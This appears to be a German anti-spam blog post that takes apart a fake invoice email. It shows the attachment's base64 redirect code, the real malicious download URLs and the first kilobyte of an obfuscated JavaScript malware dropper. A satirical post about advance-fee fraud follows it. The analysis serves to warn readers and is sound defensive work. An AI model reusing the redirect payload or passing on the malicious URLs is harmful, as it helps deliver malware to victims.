⚠️ Warnung, Schadsoftware! Auf gar keinen Fall den Anhang klicken! ⚠️
Von: Böttcher AG <no-reply@glenat.com>
An: undisclosed-recipients: ;
So so, eine Rechnung, die an ganz viele Empfänger auf einmal geht. 😂️
Natürlich kommt diese Spam nicht von der Böttcher AG, sondern von schwerkriminellen Spammern, die Rechner anderer Leute mit Schadsoftware übernehmen wollen. Bevorzugt kleine und mittelständische Unternehmen. Denen droht dann oft die Insolvenz, und dann werden Erpresser halt bezahlt. 😕️
Ihre Rechnungsnummer: 146648577349
Ihre Kundennummer: 646756981732962Lieber Kunde,
Hach, so viele schöne Zahlen, aber der einzige Name, den ich habe, ist „Lieber Kunde“. Die scheinen ihre Kunden aber nicht zu mögen. 😁️
beiliegend erhalten Sie Ihre Rechnung als HTML-Dokument.
Ah ja! Da ist ja tatsächlich ein Anhang dran. Da steht aber nicht so viel drin. Der ist nur eine Weiterleitung zu einer base64-codierten URL. Na gut, fange ich mal an – wie üblich arbeite ich mit meiner Kommadozeile unter Linux:
$ cat Rechnung-b-a_0000003198.html <body id="kqisC2MKfeohSuvlhlQyUmZZdlUGTxyDYNrBPoW05qdsUurHk2yYsHp4DgvqGBSbC5Aut1qSVdJDugOkeNeshVsoPBGnbKJ3UCLXYnFs4Bu" onpageshow="document.location.href=window.atob('aHR0cHM6Ly8zdDguYXQvYXBEOHFsb1M=');"> $ echo aHR0cHM6Ly8zdDguYXQvYXBEOHFsb1M= | base64 -d; echo https://3t8.at/apD8qloS $ mime-header https://3t8.at/apD8qloS | grep -i ^location location: https://info-opensocial.googleusercontent.com/gadgets/ifr?url=https://hatcherlawgroup.com/img/inf/inf $ _
Ab jetzt geht es nur noch mit einem richtigen Browser weiter, weil zum Zugriff auf die gängelnde und gefährliche Google-Cloud leider Javascript benötigt wird. Ja, dieser hochgefährliche Sondermüll wird anonym und kostenlos in der Cloud eines Google-Kontos gehostet. Ist es nicht „schön“, wie einfach das alles geworden ist? Hier ist längst ein Paradies für Kriminelle entstanden. Ich habe mir mal den Spaß gemacht und in einer virtuellen Maschine den Download gemacht. Die Datei ist ein ZIP-Archiv, das es in sich hat:
$ ls -lh *.zip -rw-rw-r– 1 elias elias 96K Sep 30 15:21 5640955135.zip $ zip -sf 5640955135.zip Archive contains: xi1132111.js Total 1 entries (418953 bytes) $ unzip 5640955135.zip Archive: 5640955135.zip inflating: xi1132111.js $ _
Diese Datei ist kein Dokument, sondern Programmcode, der nach klicki-klicki Doppelklick vom Windows Script Host ausgeführt wird. Dieser Programmcode ist ausgesprochen kryptisch formuliert und…
$ wc xi1132111.js 2 373 418953 xi1132111.js $ _
…steht in lediglich zwei Zeilen, die aber insgesamt rd. 420 Kilobyte Javascript-Programmcode enthalten. 😮️
Um einen Eindruck davon zu vermitteln, wie vorsätzlich schwierig analyisierbar und kryptisch dieses Programm gecodet ist, gebe ich hier mal das erste Kilobyte aus und füge nach jedem Komma einen Zeilenumbruch ein, damit man es noch bequem lesen kann:
$ dd status=none if=xi1132111.js bs=1024 count=1 | sed 's/,/,\n/g'; echo function _0×3cd5(){var _0×11cf11=['\x2f\x67\x2c\x66\x5b\x31\x46\x5d\x29\x29\x3b\x31\x67\x3d', '\x6a\x70\x66\x57\x51', '\x79\x5c\x5a\x22\x2c\x22\x5c\x6a\x5c\x6d\x22\x2c\x22\x5c', '\x56\x6b\x72\x7a\x62', '\x5c\x6b\x22\x2c\x22\x5c\x74\x5c\x31\x62\x22\x2c\x22\x5c', '\x4f\x6f\x4d\x6c\x57', '\x4d\x41\x58\x41\x73', '\x5c\x63\x5c\x68\x5c\x73\x5c\x63\x5c\x59\x5c\x63\x5c\x63', '\x75\x5d\x2b\x66\x5b\x31\x76\x5d\x2b\x66\x5b\x31\x6d\x5d', '\x61\x5c\x62\x5c\x62\x5c\x61\x5c\x62\x5c\x53\x5c\x4a\x5c', '\x6a\x61\x61\x67\x70', '\x7c\x7a\x6d\x42\x45\x6f\x52\x53\x64\x7c\x78\x34\x42\x7c', '\x61\x77\x6e\x6c\x69', '\x49\x65\x52\x45\x67', '\x5c\x73\x5c\x63\x5c\x43\x5c\x63\x5c\x70\x5c\x61\x5c\x69', '\x72\x4d\x79\x54\x48', '\x49\x6d\x77\x47\x67', '\x42\x69\x74\x77\x49', '\x5c\x75\x5c\x6e\x5c\x6d\x5c\x72\x5c\x61\x5c\x64\x5c\x6b', '\x77\x7a\x77\x47\x71', '\x61\x5c\x62\x22\x2c\x22\x5c\x65\x5c\x61\x5c\x62\x5c\x64', '\x5c\x6b\x22\x2c\x22\x5c\x6a\x5c\x55\x5c\x70\x5c\x61\x5c', '\x5c\x2b\x5c\x2b\x20\x2a\x28\x3f\x3a\x5b\x61\x2d\x7a\x41', '\x5c\x6f\x5c\x78\x5c\x63\x5c $ _
So etwas führt man doch gern auf seinem Computer aus, gelle? Vor allem, wenn es aus einer fragwürdigen Mail kommt, die von einer Rechnung faselt, aber nicht einmal eine persönliche Ansprache beinhaltet. Natürlich sollte man solchen Code nicht ausführen, auch nicht, wenn man dafür nur eine Datei doppelklicken muss. Man sollte generell E-Mail nur mit der Kneifzange anfassen. E-Mail ist sehr praktisch, das aber leider auch für Kriminelle. Wer niemals einen Anhang öffnet, der nicht vorher über ein anderes Medium als E-Mail explizit abgesprochen wurde, tut viel für seine Computersicherheit. 🛡️
Es wird sich mit an Sicherheit grenzender Wahrscheinlichkeit um Schadsoftware handeln. Diese Schadsoftware ist die neueste Brut der Kriminellen, sie wird im Moment nur von einem sehr kleinen Bruchteil der Antivirus-Programme erkannt. Zur Verdeutlichung habe ich auch einen Screenshot von VirusTotal von heute, 15:54 Uhr gemacht, weil ich hoffe, dass sich die Erkennungsrate schon in den nächsten Stunden deutlich verbessert. Das gesamte Antivirus-Schlangenöl wird also einmal mehr nicht helfen. 💀️
Vermutlich sind jetzt bereits die Netzwerke von hunderten bis tausenden Betrieben von Kriminellen übernommen worden, und in Kürze werden überall die Erpressungstrojaner Geld einfordern. Das wird Kosten verursachen und vielleicht sogar die eine oder andere Insolvenz zur Folge haben. 😵️
Auf eine Abuse-Meldung bei Google habe ich verzichtet. Ich bin nicht so ein Freund kafkaesker Erfahrungen. Stattdessen habe ich die giftige Mail an das Landeskriminalamt Niedersachsen weitergeleitet. 👮♂️️
Sobald Ihre Ware (Lagerware) unser Logistikzentrum verlassen hat, erhalten Sie per E-Mail eine Versandbenachrichtigung mit Link zur Sendungsverfolgung.
Den Status Ihrer Bestellung können Sie jederzeit in unserem Onlineshop www.bueromarkt-ag.de unter Mein Konto – Meine Bestellungen einsehen.
Fehlende Artikel werden automatisch nachgeliefert.Wenn Sie einen Artikel zurücksenden möchten, nutzen Sie bitte unsere Online-Rückgabe unter Mein Konto – Rücksendung & Reklamation.
Für Rückfragen stehen wir Ihnen gern zur Verfügung.
Vielen Dank für Ihren Auftrag.Bitte antworten Sie nicht auf diese Nachricht, da sie automatisch von einem Postfach generiert wurde, welches keine eingehenden e-Mails empfangen kann.
Mit freundlichen Grüßen
⚠️ Bitte auf gar keinen Fall darauf reinfallen! ⚠️
Hallo! 👋️
Meine wirre Mail aus der Klapsmühle ist auch nur eine Einführung in das, was ich mit dir noch besprechen will. Komm, du bist auch doch ganz heiß darauf, mehr wirre und irre Geschichten vom schlechten Erzähler zu hören! Also antworte mir einfach! Aber natürlich nicht an die Absenderadresse, die ist gefälscht. Und trotzdem ganz feste daran glauben, dass das mit dem Riesenhaufen Geld stimmt. Das muss alles übrigens voll geheim bleiben, ich will nicht, dass mein Psychiater davon erfährt. Also betrachte meine ganz geheimen Geheimpläne für meinen Geheimumzug als Geheimgeheimnis und rede mit niemanden darüber! Deshalb schreibe ich meine Geschichten zur Einleitung eines Vorschussbetruges ja auch auf Postkarten und benutze keine Verschlüsselung. 🔓️
…und bezahlst eine Vorleistung nach der anderen, weil wir die bescheuersten Methoden zum Geldtransfer benutzen, die in unserer Fantasie so aufgesprossen sind. Wir schicken dir keinen Scheck in einem versicherten Brief, den du einfach bei deiner Bank einreichen könntest, wir haben spezielle Spezialverfahren, bei denen ganz viele Vorleistungen fällig werden, fünfzigmal übler als noch die abzockerischsten Bankgebühren. Da wird dann hier eine Gebühr fällig und dort noch eine Gebühr fällig, und dann noch einmal eine teure notarielle Beglaubigung zur Erklärung gemäß Geldwäschegesetz von Fantastistan, und natürlich eine obskure Gebühr für einen Treuhänder, der das Geld bar in einer Schatzkiste neben seinem Bett vorhält. Und natürlich noch eine Bestechung für einen korrupten Beamten, die darf ja auch nicht fehlen. 💸️
